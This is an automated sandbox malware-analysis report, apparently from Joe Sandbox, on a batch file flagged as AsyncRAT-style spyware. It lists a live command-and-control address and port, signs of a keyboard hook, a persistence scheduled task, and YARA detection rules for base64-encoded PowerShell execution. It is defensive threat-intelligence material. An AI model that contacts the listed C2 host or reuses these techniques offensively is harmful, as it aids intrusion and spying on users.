        Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CEE059F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000001B12B39F264 FindFirstFileExW,31_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000001B12B39F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000001B12B39F3E8

        Networking

        Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 176.65.144.14:4567 -> 192.168.2.6:49687
        Source: C:\Windows\System32\svchost.exe | Domain query: ipwho.is
        Source: C:\Windows\System32\svchost.exe | Domain query: c.pki.goog
        Source: global traffic | TCP traffic: 192.168.2.6:49687 -> 176.65.144.14:4567
        Source: Joe Sandbox View | IP Address: 195.201.57.90
        Source: Joe Sandbox View | ASN Name: PALTEL-ASPALTELAutonomousSystemPS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: C:\Windows\System32\svchost.exe | DNS query: name: ipwho.is
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: ipwho.is | Connection: Keep-Alive
        Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.14
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
        Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1 | Cache-Control: max-age = 3000 | Connection: Keep-Alive | Accept: */* | If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT | User-Agent: Microsoft-CryptoAPI/10.0 | Host: c.pki.goog
        Source: global traffic | DNS traffic detected: DNS query: ipwho.is
        Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
        Source: svchost.exe, 00000028.00000002.2521437993.000002D66DA5A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/
        Source: lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: lsass.exe, 00000012.00000000.1499856901.000002158A618000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2549199221.000002158A618000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: powershell.exe, 0000000F.00000002.2535010729.0000015205CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cable
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 00000012.00000000.1499674400.000002158A051000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2535984432.000002158A051000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 0000000C.00000002.1360502922.000002454C4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360502922.000002454C3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: lsass.exe, 00000012.00000002.2539274250.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500025751.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000003.1688285146.000002158A6B9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2566755707.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1500137682.000002158A7A4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2561597694.000002158A6E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453C341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: lsass.exe, 00000012.00000000.1499674400.000002158A051000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2535984432.000002158A051000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: lsass.exe, 00000012.00000002.2534107158.000002158A02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000000.1499648295.000002158A02F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: svchost.exe, 00000021.00000000.1582566145.0000024467C0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453C341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdC:
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 0000001B.00000003.1565636382.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1553182575.00000220C4491000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1574409504.00000220C4493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000C.00000002.1337383847.000002453D7F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000C.00000002.1360502922.000002454C4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360502922.000002454C3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337383847.000002453DD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 0000002C.00000000.1634990060.000001F3100E8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2520568443.000001F30F281000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
        Source: svchost.exe, 0000002C.00000002.2593194718.000001F30FFC8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
        Source: svchost.exe, 0000001B.00000000.1551921933.00000220C4222000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-am3p.notify.windows.com/?token=AwYAAABko8Pt%2bIZCV9CUJQVFMfcpyzlufwToQyioeYvYvJGchZHf6P
        Source: svchost.exe, 0000002C.00000000.1636987968.000001F310249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.6:49690 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DirectInput8Create memstr_802f48c5-9
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: GetRawInputData memstr_a0d2751b-6
        Source: Yara match | File source: 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR

        System Summary

        Source: Process Memory Space: powershell.exe PID: 3316, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: skf7iF4.bat | Static file information: 6302909
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE5235B8 NtEnumerateKey,NtEnumerateValueKey,16_2_00000234FE5235B8
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE524038 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,16_2_00000234FE524038
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE523840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue,16_2_00000234FE523840
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE2D1C NtQuerySystemInformation,StrCmpNIW,18_2_000002158AEE2D1C
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F088943840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue,20_2_000001F088943840
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F0889435B8 NtEnumerateKey,NtEnumerateValueKey,20_2_000001F0889435B8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC2D1C NtQuerySystemInformation,StrCmpNIW,24_2_0000016588BC2D1C
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE524038: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,16_2_00000234FE524038
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-mPeY5dGd
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BBE7E84_3_000001B780BBE7E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BB34384_3_000001B780BB3438
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BBE6644_3_000001B780BBE664
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF3E84_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE40384_2_000001B780BE4038
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF2644_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072FE7E85_3_00000264072FE7E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072F34385_3_00000264072F3438
        Source: C:\Windows\System32\conhost.exeCode function: 5_3_00000264072FE6645_3_00000264072FE664
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F3E85_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_00000264073240385_2_0000026407324038
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F2645_2_000002640732F264
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B2A760612_2_00007FF88B2A7606
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4FE66416_3_00000234FE4FE664
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4FE7E816_3_00000234FE4FE7E8
        Source: C:\Windows\System32\more.comCode function: 16_3_00000234FE4F343816_3_00000234FE4F3438
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52403816_2_00000234FE524038
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F26416_2_00000234FE52F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F3E816_2_00000234FE52F3E8
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786E66417_3_000001B92786E664
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786343817_3_000001B927863438
        Source: C:\Windows\System32\winlogon.exeCode function: 17_3_000001B92786E7E817_3_000001B92786E7E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEBE66418_3_000002158AEBE664
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEB343818_3_000002158AEB3438
        Source: C:\Windows\System32\lsass.exeCode function: 18_3_000002158AEBE7E818_3_000002158AEBE7E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF26418_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE403818_2_000002158AEE4038
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF3E818_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDC343819_3_000001E89FDC3438
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDCE7E819_3_000001E89FDCE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_000001E89FDCE66419_3_000001E89FDCE664
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF26419_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF3E819_2_000001E8A01AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A403819_2_000001E8A01A4038
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891343820_3_000001F088913438
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891E66420_3_000001F08891E664
        Source: C:\Windows\System32\dwm.exeCode function: 20_3_000001F08891E7E820_3_000001F08891E7E8
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894403820_2_000001F088944038
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F26420_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F3E820_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4E66421_3_000001AC86F4E664
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4E7E821_3_000001AC86F4E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001AC86F4343821_3_000001AC86F43438
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F26421_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F3E821_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7403821_2_000001AC86F74038
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8E66422_3_0000014785F8E664
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8343822_3_0000014785F83438
        Source: C:\Windows\System32\svchost.exeCode function: 22_3_0000014785F8E7E822_3_0000014785F8E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF26422_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB403822_2_0000014785FB4038
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF3E822_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CE343823_3_000001DC59CE3438
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CEE7E823_3_000001DC59CEE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001DC59CEE66423_3_000001DC59CEE664
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1403823_2_000001DC59D14038
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F3E823_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F26423_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF26424_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF3E824_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC403824_2_0000016588BC4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDBE66425_3_0000017A8CDBE664
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDB343825_3_0000017A8CDB3438
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000017A8CDBE7E825_3_0000017A8CDBE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F3E825_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34403825_2_0000017A8D344038
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F26425_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B403826_2_000001F34D8B4038
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF3E826_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF26426_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26D343827_3_00000220C26D3438
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26DE66427_3_00000220C26DE664
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_00000220C26DE7E827_3_00000220C26DE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270403827_2_00000220C2704038
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F26427_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F3E827_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6343828_3_0000025AF1E63438
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6E7E828_3_0000025AF1E6E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_3_0000025AF1E6E66428_3_0000025AF1E6E664
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9403828_2_0000025AF1E94038
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F3E828_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F26428_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5CE66429_3_0000027BFF5CE664
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5C343829_3_0000027BFF5C3438
        Source: C:\Windows\System32\svchost.exeCode function: 29_3_0000027BFF5CE7E829_3_0000027BFF5CE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F26429_2_0000027BFFD3F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3403829_2_0000027BFFD34038
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F3E829_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056343830_3_000001CEE0563438
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056E66430_3_000001CEE056E664
        Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CEE056E7E830_3_000001CEE056E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059403830_2_000001CEE0594038
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F26430_2_000001CEE059F264
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F3E830_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36E66431_3_000001B12B36E664
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36E7E831_3_000001B12B36E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36343831_3_000001B12B363438
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F26431_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F3E831_2_000001B12B39F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39403831_2_000001B12B394038
        Source: C:\Windows\System32\conhost.exeCode function: String function: 0000026407322680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000017A8D342680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001DC59D12680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000220C2702680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001E8A01A2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000025AF1E92680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001B12B392680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000014785FB2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001CEE0592680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000016588BC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000027BFFD32680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001F34D8B2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001AC86F72680 appears 44 times
        Source: C:\Windows\System32\more.comCode function: String function: 00000234FE522680 appears 44 times
        Source: C:\Windows\System32\cmd.exeCode function: String function: 000001B780BE2680 appears 44 times
        Source: C:\Windows\System32\lsass.exeCode function: String function: 000002158AEE2680 appears 44 times
        Source: C:\Windows\System32\dwm.exeCode function: String function: 000001F088942680 appears 44 times
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4325
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4325
        Source: Process Memory Space: powershell.exe PID: 3316, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.spyw.evad.winBAT@17/74@2/3
